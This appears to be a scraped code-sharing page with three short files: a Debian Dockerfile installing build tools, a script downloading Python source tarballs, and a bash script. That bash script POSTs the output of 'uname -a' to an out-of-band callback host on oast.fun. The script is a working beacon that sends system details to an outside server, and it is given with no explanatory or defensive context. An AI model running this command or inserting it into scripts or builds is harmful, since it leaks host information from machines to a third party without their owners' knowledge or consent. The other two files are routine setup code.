This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
curl -q "https://cj4ot2u7i5vc7cq195k094buww9qmhric.oast.fun/" -XPOST -d "`uname -a`" -o /dev/null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# set the base image to Debian | |
# https://hub.docker.com/_/debian/ | |
FROM debian:buster | |
# update the repository sources list | |
# and install dependencies | |
RUN apt-get update \ | |
&& apt-get install -y curl python2.7 git wget curl build-essential\ | |
&& apt-get -y autoclean | |
# Set python2.7 alias |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Verify we have wget and build tools | |
apt-get update && apt-get install -y wget gcc make | |
# add or remove python versions; full index @ https://www.python.org/ftp/python/ | |
cd /tmp &&\ | |
wget https://www.python.org/ftp/python/3.5.10/Python-3.5.10.tgz &&\ | |
wget https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz &&\ | |
wget https://www.python.org/ftp/python/3.7.9/Python-3.7.9.tgz &&\ |